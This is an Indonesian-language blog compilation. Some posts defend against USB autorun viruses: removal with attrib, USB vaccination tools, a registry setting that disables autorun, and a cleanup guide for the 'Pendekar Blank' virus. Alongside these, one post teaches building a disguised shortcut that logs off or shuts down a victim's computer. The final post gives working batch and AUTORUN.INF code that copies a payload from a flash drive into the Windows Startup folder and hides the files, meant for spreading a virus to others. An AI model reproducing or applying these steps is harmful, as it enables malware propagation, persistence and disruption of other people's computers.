Cara Menghapus Virus Shortchut/Autorun/Recycle

kebanyakan virus Shortchut/Autorun/Recycle ini terdapat di drive dan flashdisk, Namun itu semua tergantung dari penggunaan kamu sendiri.Anti virus juga mesti diperhatikan, seperti Smadav, Avira, dsb. tidak bisa di gunakan untuk menghapus virus Shortchut/Autorun/Recycle ini. namun dapat digunakan hanya sebagai pendeteksi namun tidak terhapus...
saya sekarang akan memberi tips agar virus Shortchut/Autorun/Recycle ini dapat di hilangkan ataupun di hapus.

1. Menggunakan anti virus AVAST PRO
caranya tinggal scan saja, namun agar lebih optimal sebaiknya menscannya lewat boot(restart scan).Walau AVAST PRO ini versi 6 namun tidak jauh kehebatannya dengan yang versi baru.

2. Menggunakan Command Prompt
-buka START atau Window
-Run, lalu ketik" cmd " (tanpa petik) atau juga All Program>Accessories>Command Prompt
-Lalu ketika di Command Prompt ketik(drive yang diinginkan).Contoh: " F: " (tanpa petik) lalu ENTER.
-Ketik " dir/a " (tanpa petik). Hal ini berguna untuk melihat semua data yang ada di drive kamu.
-Lalu ketik " attrib -s -h -r /s /d " (tanpa petik). Hal ini berguna untuk nonhide kan data yang ada.
-Kemudian kamu tinggal hapus saja virus Shortchut/Autorun/Recycle yang ada atau terlihat di drive kamu.

3. Menjadikan data kamu RAR(winrar)
-klik kanan, pilih add to archive
-pada compression method, pilih best
-di bawahnya kamu pilih sesuai kebutuhan (kalau pusing milih yang mana pilih saja yang Auto)


-lalu tekan ok



4. Memberi password/ mengunci data kamu
-caranya dapat dilihat disini 

~selamat mencoba dan semoga sukses~



cara membuat virus- virusan

Baiklah akhirnya gw nemuin cara bwt virus lagi...
kali ini virus buat ngejahilin orang...
klo bahasa gaulnya sih.. fake virus...
tapi, tetep aja pke gaya lama.
pake script logoff...
lho kok logoff lagi, logoff lagi...
alah, biarin soalnya gw cuma tau yang gini gini doang...


ok
langsung aj...

kita tanem ni virus di desktop,
caranya, ikutin langkah pembuatan di bawah ini :

1. klik kanan pada desktop, pilih new >>> Shortcut,
2. trus pada Type the location blank...blank...blank... isi Logoff. klik next
3. lalu pada Type a name blank...blank...blank... isi My Computer.
4. klik Finish

nah, fake virus nya dah jadi...
tinggal disempurnain aj !!! ikutin langkah penyempurnaan di bawah ini :

1. Klik kanan pada virus kita tadi.... pilih properties...
2. Klik Change Icon,, truz, klo muncul tulisan yg ngganggu langsung klik ok aj...
3. Icon my computer... biasanya di bagian bawah... urutan nomer 4...
4. klik Ok....

seeppp...
klo udah,,
buat ngibulin orang yang make komputer kita, hapus my computer yg asli...

seeppp klo dah diapus.......
apa ??? ada yg gk tau cara ngapus.. ???
ok deh gw ksih tau.... klik kanan di my computer yg asli...
pilih delete >>> klik yes... !!!
Ok, klo dh selesai diapus...
tinggal refresh aj desktopnya !!!

Ketika si korban mengklik virus-virusan yang kita buat tadi Maka dengan sendirinya komputer yang dipake bakalan -ng-Logoff-in dirinya...!

Tambahan :
Pada langkah pembuatan nomer 2 diatas logoff bisa diganti pake Shutdown (gunanya buat matiin komputer)

and

Pada langkah penyempurnaan nomer 3 diatas Icon virus bisa diganti pake icon yg lain terserah deh mo pilih icon yang mana...
Mo Ms Word, Ms Exel, Ms Powerpoint, My document, De'eL'eL (dan laen-laen) terserah mo yg mana aja sesuai keinginan Elo Elo pade...!!!

Stop Penyebaran Autorun Virus dengan USB Defender


Meskipun penyebaran virus melalui teknik Autorun Windows sudah mulai menurun, tetapi celah keamanan ini tidak bisa kita abaikan begitu saja. Sebagian virus masih tetap menggunakan Autorun.inf di USB Flashdisk sebagai pemicu agar mudah tersebar di berbagai komputer. Jika sebelumnya saya pernah membahas tentang Panda USB Vaccine, kini ada alternatif lain, yaitu USB Defender.

Teknik vaksinasi USB sebenarnya sudah lebih dari satu tahun digunakan oleh berbagai software keamanan. Termasuk antivirus lokal seperti Smadav juga menggunakan teknik ini. Teknik ini dengan membuat file atau folder dengan nama Autorun.inf yang di proteksi sehingga tidak bisa di hapus, di rename atau diubah. Dengan begini, virus yang akan membuat file autorun.inf tidak akan bisa dan penyebaran ke komputer lain bisa di kurangi.




Perlu di ingat bahwa vaksinasi seperti ini hanya mencegah penyebaran melalui autorun.inf saja dan tidak akan mencegah USB Flashdisk terkena virus. Jadi Flashdisk bisa tetap terkena virus, hanya saja tidak akan menyebar ke komputer lain secara otomatis.
USB Defender

USB Defender di kembangkan dengan teknik seperti itu, yaitu akan membuat Folder Autorun.inf yang di proteksi dengan 5 tingkatan. Penggunaannya sangat mudah, kita tinggal memilih drive USB Flash drive yang akan di proteksi, kemudian klik tombol Protect.

Agar proteksi menggunakan 5 tingkatan, menu Pro method harus diaktifkan ( di cek). Dan untuk melakukan hal ini, pengguna komputer harus mempunyai hak akses administrator.

Teknik proteksi menggunakan USB defender ini memang cukup ampuh. Seperti halnya Panda USB Vaccine, teknik proteksi ini tidak bisa di hapus dengan software Unlocker ( proteksi SmadAv masih bisa dihapus dengan Unlocker). Tetapi jika “Pro Method” tidak dipilih, proteksinya hanya 4 tingkatan (4/5) dan autorun.inf masih bisa dihapus dengan Unlocker. Oleh karena itu pastikan pro method dipilih ketika proteksi USB Flashdisk.


Jika Flashdisk kita sebelumnya sudah di proteksi dengan Panda USB Vaccine, proteksi tersebut tetap bisa kita ganti dengan proteksi dari USB Defender.

Selain bersifat portable ( tidak perlu install), USB Defender juga mendukung semua file sistem windows ( FAT atau NTFS ). Menurut pembuatnya, USB Defender juga lebih powerfull dibanding Panda USB Security dan USB Threat Defender.



Download Speed Out
Download USB Defender(4 software)

stop penyebaran virus flashdisk dengan MX One


Seperti telah diketahui, bahwa flashdisk merupakan media yang paling sering digunakan sebagai penyebar virus, trojan, worm dan lainnya. Termasuk juga MP3, MP4 player, Memory Card dan media berbasis USB lainnya. Salah satu metode untuk mencegah aplikasi otomatis berjalan dari media tersebut adalah mematikan fasilitas autorun windows ( Bisa dibaca disini ).

Selain itu, antivirus biasanya juga otomatis mendeteksi Autorun yang ada di flashdiks, dan akan mengecek apakah ada virus atau tidak. Tetapi jika ingin cara lain dan lebih mudah untuk melindungi dari virus yang otomatis bisa berjalan dari flashdisk,Mp3/Mp4 player, ipod, MemoryCard (SD, MicroSD, MMC, Memori M2 dan sejenisnya) bisa mencoba freeware Mx One Antivirus


Mx One antivirus merupakan antivirus yang di design khusus untuk melindungi komputer dari virus yang sering menular dari flashdisk dan juga melindungi flashdisk iu sendiri dari berbagai virus, trojan, worm dan lainnya. Tampilannya sangat sederhana, sehingga cukup mudah bagi pengguna awam pun. Fasilitas selengkapnya sebagai berikut :
Melindungi dari Virus, Trojan, Worm dan lainnya
Kompatibel dengan antivirus lainnya, seperti NOD32, Kaspersky, BitDefender, AVG, Norton dan lainnya
Realtime protection
System “Check and Block” yang akan menetralkan semua virus yang akan menginfeksi media yang digunakan (seperti flashdisk), ketika dipasang di komputer yang terinfeksi virus, bahkan yang belum dikenal
Fasilitas “Guardian” untuk melindungi PC dari virus yang akan dijalankan dari flashdisk
Melindungi dari virus yang tidak dikenal dengan sistem “Check and Block”
Ukuran yang sangat kecil, hanya memerlukan sekitar 1 MB space
100% Gratis

Mx One antivirus bisa di install di PC dan di flashdisk. Hanya saja ketika di install di flashdisk sepertinya kurang banyak bermanfaat, terutama ketika fasilitas autorun dimatikan. Tetapi jika di install di PC cukup membantu dan bermanfaat. Ketika saya mencoba memasukkan flashdisk yang tidak ada virusnya (bersih), maka mx one menampilkan bahwa flashdisk clean. Seperti berikut






MX One antivirus juga menyediakan update, baik secara online maupun offline. Antivirus ini berasal dari Perancis (Mexico), Tetapi keterangan cara update disertakan dengan bahasa Perancis. Website resmi dan keterangannya sebagian dalam bahasa Perancis (Mexico)

Cara Update Manual :
Download file update dari alamat yang ada dibawah. Kemudian, setelah selesai, ikuti langkah berikut :
Buka file yang ada dalam zip
Di Icon Mx One yang ada di sistem tray (pojok kanan bawah), klik dan pilih “Open Guardian”
Pada bagian Update pilih tombol Update Offline kemudian cari file *.mou (MxOneGuardianUpdate.mou) dari yang ada di file update
Setelah itu antivirus akan diupdate

Perlu diingat bahwa antivirus ini jika di install di PC khusus untuk melindungi penyebaran atau menular-nya virus dari media seperti flashdisk, SD, MicroSD, MP3/MP4 player dan media sejenisnya. Jadi tidak memproteksi sepenuhnya dari virus di PC (http://ebsoft.web.id)

Informasi Download
Download ( 1 MB) 

Download Update( ~270KB)
Kunjungi websitenya disini : http://www.mxone.net/en/

mencegah virus di flash disk


 
Dengan penggunaan flashdisk yang sudah umum dimana-mana, menjadi salah satu sebab menjamurnya virus, terutama virus lokal. Ini terlihat sejak masa jayanya virus brontok. Sampai saat ini, saya sering sekali melihat hampir setiap komputer/laptop teman-teman di perkantoran terkena virus, yang terkadang mereka tidak menyadari. Selain Antivirus yang seharusnya senantiasa diupdate minimal seminggu sekali, sebenarnya ada tips yang sangat bermanfaat untuk mencegah menularnya virus dari media seperti flashdisk tanpa kita sadari. Berikut langkah-langkahnya :


1.Buka Registry Editor, dengan cara klik Start Menu > Run dan ketik regedit dan klik OK

2.Cari Lokasi :
   KEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

3.Buat key baru ( Klik kanan > New > DWORD Value ) beri nama : NoDriveAutoRun

4.Double klik untuk mengisi nilai ( data ). Pilih Base : Decimal dan isikan Value data dengan nilai 67108863

5.Jika diperlukan, dapat juga menambahkan nilai yang sama di
   HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

6.Restart Komputer


Dengan penambahan setting ini, maka ketika kita memasang flashdisk, windows tidak akan otomatis menjalankan program autorun yang ada di flashdisk. 

Settings:
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
Name: NoDriveAutoRun
Type: REG_DWORD (DWORD Value)
Value: 32-bit bitmask

cara ngebasmi virus pendekar blank

Oy Frein2 Semuanya !!!, ni gw ada Trik BWT Ngancurin Virus Pendekar.Blank..
So langsung aja yach.
Semua misi virus ini dapat anda lihat pada File (Read Me)Pendekar Blank.txt yang terletak pada drive C:\ pada komputer yang telah terinfeksi virus ini. Kurang lebih screen shoot file (Read Me)Pendekar Blank.txt seperti terlihat pada gambar berikut
Gambar file (Read Me)Pendekar Blank.txt
Tolls yang saya pergunakan adalah Proclister dapat di download di sini.
Ok mari kita mulai membasmi virus ini.
Pertama kali dieksekusi virus ini akan membuat sebuah folder dengan nama duplikat virus itu sendiri. Misalnya virus tersebut telah menyebar ke flashdisk anda dengan nama yadoy.exe, maka pada saat virus itu dieksekusi dengan segera ia akan membuat folder dengan nama yadoy dengan attribute super hidden ( +S +H) dan akan membuka folder tersebut. Langkah ini dilakukan virus tersebut dengan maksud membuat user tidak sadar bahwa yang dieksekusi bukanlah virus tetapi merupakan sebuah folder kosong. Ini merupakan cara yang cerdik untuk mengelabuhi user.
Selanjutnya virus ini akan menggandakan dirinya di
• c:\aut0exec.bat
• c:\windows\system32\dllcache\Regedit32.com
• c:\windows\system32\dllcache\Shell32.com
• c:\windows\system32\dllcache\rund1132.exe
• c:\windows\system32\dllchache.exe
• c:\windows\system32\M5VBVM60.exe
• c:\(Read Me)Pendekar Blank.txt
• c:\windows\system32\dllchache\blank.doc
• c:\windows\system32\dllchache\empty.jpg
• c:\windows\system32\dllchache\hole.zip
• c:\windows\system32\dllchache\msvbvm60.dll
• c:\windows\system32\dllchache\unoccupied.reg
• c:\windows\system32\dllchache\zero.txt
• c:\windows\system32.exe
virus ini juga akan mengacak-acak registry windows. Registry yang diacak-acak adalah
• HKCU\Software\Microsoft\Windows\CurrentVersion\run ==> Secure32
• HKCU\Software\Microsoft\Windows\CurrentVersion\run ==> Secure64
• HKLM\Software\Microsoft\Windows\CurrentVersion\Run ==> Blank Antiviri
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon ==> userinit
• HKCR\comfile\shell\open\command ==> c:\windows\system32\run1123.exe
• HKLM\System\Currentcontrolset\control\safeboot ==> AlternateShell
• HKLM\System\Controlset001\control\safeboot ==> AlternateShell
Virus ini juga akan menyembunyikan semua isi flash disk dengan cara merubah attribute semua file menjadi super hidden dan mengkopikan dirinya ke flash disk dengan menggunakan nama-nama folder yang ada pada flash disk. Virus ini mempunyai ke unikan bila dibandingkan virus-virus local yang lain. Bisaanya virus-virus local akan memblokir akses Registry, Command Prompt, Msconfig dan Task Manager, tetapi virus ini beda.
Pada komputer yang telah terserang virus ini akses ke akses Registry, Command Prompt, Msconfig dan Task Manager tidak diblok, user tetap bisa membuka akses Registry, Command Prompt, Msconfig dan Task Manager. Saya tidak mengetahui apa maksud dari sang Virus Maker mengapa ia tidak memblok aplikasi-aplikasi tersebut, padahal aplikasi-aplikasi bawaan windows tersebut dapat dipergunakan untuk membasmi keberadaan virus tersebut. Kalau menurut pendapat saya alasan mengapa sang virus maker tidak memblok aplikasi-aplikasi tersebut adalah agar user tidak sadar bahwa komputernya telah terjangkit virus. Tapi motif yang sebenarnya hanya sang Virus Maker dan Tuhan lah yang tahu jawabannya. ;P
Lalu kita lanjutkan pada sesi pembasmian virus ini. Yang pertama kita lakukan adalah menghentikan proses virus yang berjalan pada memori. Tolls yang kita pergunakan adalah Proclister. Mungkin anda bertanya mengapa saya tidak menggunakan taskmanager bawaan windows saja, kan taskmanager tidak diblok oleh virus ini. Jawabannya adalah, prosses virus yang berjalan pada memori adalah blank.doc, empty.jpg, hole.zip, unoccupied.reg, zero.txt. Kesemua proses virus di memory tersebut akan salang mengecaek dan melindungi.
Apabila salah satu proses virus dimemory tersebut kita matikan maka proses virus yang lain akan berusahaa untuk menjalankannya kembali. Apabila kita menggunakan taskmanager kita tidak bisa mematikan semua proses virus, tetapi kita hanya dapat mematikan satu proses viru saja. Dengan menggunakan proclister kita dapat mematikan keseumua prosses virus di memory, dengan cara klik kanan dan pilih “Kill VB Application”.
Proses virus di memory yang tertangkap proclister
Setelah semua proses virus dimemory perhasil dimatikan, langkah selanjutnya adalah menghapus semua duplikat virus di komputer. Duplikat virus ini berada di :
• c:\aut0exec.bat
• c:\windows\system32\dllcache\Regedit32.com
• c:\windows\system32\dllcache\Shell32.com
• c:\windows\system32\dllcache\rund1132.exe
• c:\windows\system32\dllchache.exe
• c:\windows\system32\M5VBVM60.exe
• c:\(Read Me)Pendekar Blank.txt
• c:\windows\system32\dllchache\blank.doc
• c:\windows\system32\dllchache\empty.jpg
• c:\windows\system32\dllchache\hole.zip
• c:\windows\system32\dllchache\msvbvm60.dll
• c:\windows\system32\dllchache\unoccupied.reg
• c:\windows\system32\dllchache\zero.txt
• c:\windows\system32.exe
Untuk menghapus duplikat virus ini anda harus men set folder option agar menampilkan semua file yang dihidden dan menampilkan semua system file. Langkah ini harus dilakukan agar file duplikat virus yang terletak di c:\windows\system32\dllchache dapat terlihat, karena folder dllchache di set supper hidden oleh sang virus. Apabila anda tidak menset folder option seperti diatas maka folder dllchache tidak akan terlihat. Untuk menampilkan semua file anda yang dihidden pada flashdisk buka Command Prompt, masuk ke dalam drive flashdisk anda dan ketikan perintah attrib –s –h /s /d
Setelah menghapus semua duplikat virus langkah selanjutnya adalah membersihkan registry yang telah di acak-acak oleh sang virus. Untuk mudahnya silahkan kopi-paste script berikut ke notepad
[Version]
Signature=”$Chicago$”
Provider=yadoy666
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCR, comfile\shell\open\command,,,”"”%1?” %*”
HKLM, SYSTEM\ControlSet001\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SYSTEM\CurrentControlSet\Control\SafeBoot, AlternateShell,0, “cmd.exe”
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Userinit,0, “C:\Windows\system32\userinit.exe,”
HKCU, Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced, ShowSuperHidden,0×00010001,1
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, Userinit.,0, “userinit.exe”
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Run, Secure32
HKCU, Software\Microsoft\Windows\CurrentVersion\Run, Secure64
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Blank Antiviri

Simpan dengan nama “yadoy.inf” (tanpa tanda petik). Klik kanan pada file “yadoy.inf” lalu pilih install. Kemudian restart komputer anda. Maka komputer anda pun telah bersih dari pengaruh virus Pendekar Blank.

nyebarin virus pake flashdisk

Ok pada post kali ni... gw bakal ngebahas tentang gimana cara nyebarin virus sederhana lewat FlashDisk
Ok, kayak Biasa to the poin aj.....
pertama, siapin alat-alatnya !!!
1. Yang Pastinya Sebuah komputer Berikut mouse, keyboard, Monitor, and supaya lebih abdol ditemenin ama minuman, kayak teh, kopi, susu, eiiiit jangan BIR, tar MABOX
2. Sebuah FlashDisk
3. Siapin Juga Virus yang udah gw kasih tau di artikel sebelumnya !!!
kalo blm tau klik disini
4. Udah Cuma Itu Aj
kalo dah siap ikuti petunjuk di bwh ini :
1. Save Virus Yang dah Dibuat di artikel sebelumnya di dalem FlashDisk
kalo udah !!!
2. Buka Notepad And tulis :

xcopy (nama file virus yg udah dibuat tadi).bat /h /y "%homedrive%\Documents and Settings\All Users\Start Menu\Programs\Startup"
attrib -h -s "%homedrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\(nama file virus yg udah dibuat tadi).bat"
3. save di dalem flashdisk, dengan nama apa aja, TERSERAH !!! tapi harus pake ekstensi .bat
(contoh, kita buat aj A.bat)
Nih, selajutnya....
1. Buka lagi notepad, And tulis script di bwh ini :
[Autorun]
open=A.bat
shellexecute=A.bat
shell\open\command=A.bat
open=default1
2. Save di dalem FlashDisk dengan nama "AUTORUN.INF" (gak pake tanda kutip)
3. kalo udah cabut FlasDisk nya dan tancepin ulang !!!
KETIKA FLASHDISK UDAH DICOLOK KE KOMPUTER COBA AJA BUKA My Computer DOBEL KLIK FLASHDISKNYA !!!!
JRENG...JRENG...JRENG FILE YANG DIBUAT DI ARTIKEL SEBELUMNYA BAKAL MENG-KOPI DIRINYA SENDIRI DI DIREKTORI
"c:\Documents and Settings\All Users\Start Menu\Programs\Startup"
SO, LO GAK PERLU LAGI SUSAH-SUSAH NYIMPEN FILE NYA SECARA MANUAL !!!! COZ, BISA NYIMPEN SENDIRI SECARA OTOMATIS !!!
TROUBLESHOOTING :
1. Gimana Cara Ngebuka FlashDisk nya ?????
* Masak Gak tau, Pake aja Windows Explorer !!!
2. Waduh FlashDisknya Banyak file-file Virus Yg Tadi, Kan jadi Gak Enak Ngeliatnya !!!
* File-File Virus Tadi Di hidden Aja, Caranya Blok file-file Virus Tadi Klik kanan Pilih properties, And pada attributes : centang HIDDEN, KLIK Ok
file-filenya bakal ilang !!!!!
OOOKKKEEE, Sekian aj artikel dr gue ttg gimana cara nyebarin virus sederhana pake FlashDisk
so, Good Bye See you on the next Article !!!!!!!!!